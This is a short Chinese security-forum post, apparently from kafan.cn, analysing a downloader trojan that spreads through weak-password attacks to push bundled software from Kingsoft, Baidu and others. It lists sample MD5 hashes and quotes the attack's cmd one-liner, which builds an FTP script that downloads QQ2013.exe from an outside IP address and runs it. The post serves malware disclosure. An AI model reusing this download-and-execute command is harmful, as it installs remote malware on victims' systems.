金山病毒推广还没停?新发现的下载者病毒样本
还是用的弱密码漏洞,和“黑鹰”病毒的手法差不多(具体可见之前的帖子:h ttp://bbs.kafan.cn/thread-1494510-1-1.html)。这次推广的软件包括金山卫士、金山毒霸、猎豹浏览器、无极影音、百度浏览器、PPTV等等十几款,这已经是最近一个多月以来的第5次了。从日志上看,在凌晨0点到1点这段时间黑客开始攻击,每小时大概能有10-20次攻击。
并且,金山毒霸对这两个样本都不拦截。。。
样本MD5:
4EBE7AE4E14D68AE1019E48016A1C0EF
019A1305C5F7E8A814092DC8D8C2B6C4
用作分析的样本MD5:019A1305C5F7E8A814092DC8D8C2B6C4
/c@echoopen198.100.120.148>>log.dat&@echo123>>log.dat&@echo123>>log.dat&@echobin>>log.dat&@echogetQQ2013.exe>>log.dat&@echobye>>log.dat&@ftp-s:log.dat&dellog .dat&QQ2013&QQ2013.exe&QQ2013.exe
1、黑客的ftp:
http://img142.poco.cn/mypoco/myphoto/20130510/22/64752577201305102202043323582223241_002.jpg
2、木马是个百度网盘转换器。
http://img142.poco.cn/mypoco/myphoto/20130510/22/64752577201305102202043323582223241_001.jpg
3、因为和黑鹰类似,中间过程不再详述了,感兴趣的可以自己去查一下h ttp://bbs.kafan.cn/thread-1494510-1-1.html
4、下载者木马在安装程序,有十几款
http://img142.poco.cn/mypoco/myphoto/20130510/22/64752577201305102202043323582223241_000.jpg
页:
[1]